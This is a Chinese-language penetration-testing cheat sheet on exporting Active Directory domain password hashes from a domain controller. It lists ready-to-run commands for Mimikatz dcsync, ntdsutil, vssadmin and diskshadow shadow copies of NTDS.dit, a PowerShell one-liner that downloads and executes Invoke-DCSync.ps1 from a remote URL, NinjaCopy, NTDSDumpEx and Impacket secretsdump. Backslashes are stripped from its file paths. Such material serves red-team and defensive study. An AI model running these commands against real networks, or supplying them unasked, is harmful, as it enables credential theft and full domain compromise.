域渗透之导出域Hash
前言
网上采集了一些域内导出NTDS.dit文件的方式
Hash 值存储在域控制器中(C:WindowsNTDSNTDS.DIT)
Mimikatz
Mimikatz有一个功能(dcsync),它利用目录复制服务(DRS)从 NTDS.DIT 文件中检索密码 Hash 值。
Mimikatz "lsadump::dcsync /domain:test.com /all /csv" exit > hash.txt //所有用户
Mimikatz "lsadump::dcsync /domain:test.com /user:username" exit > hash.txt //# 指定用户
Ntdsutil
Ntdsutil 域控制器默认安装,使管理员能访问和管理 Windows Active Directory 数据库。渗透测试中可以用它来拍摄 ntds.dit 文件的快照
# 创建快照
ntdsutil snapshot "activate instance ntds" create quit quit
GUID 为 {aa488f5b-40c7-4044-b24f-16fd041a6de2}
# 挂载快照
ntdsutil snapshot "mount GUID" quit quit
# 复制 ntds.dit
copy C:$SNAP_201908200435_VOLUMEC$windowsNTDS
tds.dit c:
tds.dit
# 卸载快照
ntdsutil snapshot "unmount GUID" quit quit
# 删除快照
ntdsutil snapshot "delete GUID" quit quit
# 查询快照
ntdsutil snapshot "List All" quit quit
ntdsutil snapshot "List Mounted" quit quit
Vssadmin
域控制器默认安装
# 查询当前系统的快照
vssadmin list shadows
# 创建快照
vssadmin create shadow /for=c: /autoretry=10
"Shadow Copy Volume Name" 为 \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1
"Shadow Copy ID" 为 {aa488f5b-40c7-4044-b24f-16fd041a6de2}
# 复制 ntds.dit
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1windowsNTDS
tds.dit c:
tds.dit
# 删除快照
vssadmin delete shadows /for=c: /quiet
Diskshadow
DiskShadow 是由微软官方签名的,Windows Server 2008、2012、2016 都包含了 DiskShadow,所在目录C:windowssystem32diskshadow.exe。包含交互式命令和脚本模式。
# 查看存放 `ntds.dit` 的逻辑驱动器(一般为 C 盘)
# 找出系统没有使用的逻辑驱动器号
wmic logicaldisk
# 调用脚本
C:windowssystem32diskshadow.exe /s C:shadow.txt
shadow.txt 内容
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "C:windowssystem32cmd.exe" /c copy z:windows
tds
tds.dit c:
tds.dit
delete shadows volume %someAlias%
reset
Powershell
项目地址:https://github.com/EmpireProject/Empire
# 远程加载 Invoke-DCSync.ps1
# 远程加载 Invoke-DCSync.ps1
powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-DCSync.ps1')";Invoke-DCSync -PWDumpFormat > hash.txt
通过NinjaCopy获得域控服务器NTDS.dit文件
ninjacopy下载地址:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1
Import-Module -name .Invoke-NinjaCopy.ps1 Invoke-NinjaCopy -Path "c:windows
tds
tds.dit" -LocalDestination "c:
tds.dit" Invoke-NinjaCopy -Path "C:WindowsSystem32configSYSTEM" -LocalDestination "c:system.hiv"
ntds.dit 提取 Hash
NTDSDumpEx
# 离线模式:先导出注册表
reg save hklmsystem system.hiv
NTDSDumpEx.exe -d ntds.dit -s system.hiv -o hash.txt
# 在线模式:无需导出注册表
NTDSDumpEx.exe -d ntds.dit -r -o hash.txt
Impacket
项目地址:https://github.com/SecureAuthCorp/impacket
因为 Kali 的 python 环境安装得比较全,所以使用 Kali 来解 Hash
python secretsdump.py -ntds /home/workspace/hash/ntds.dit -system /home/workspace/hash/sys.hiv LOCAL > /home/workspace/hash/hash.txt
使用 Ntdsutil、Vssadmin 等卷影拷贝工具时,需要先开启 Volume Shadow Copy Service 服务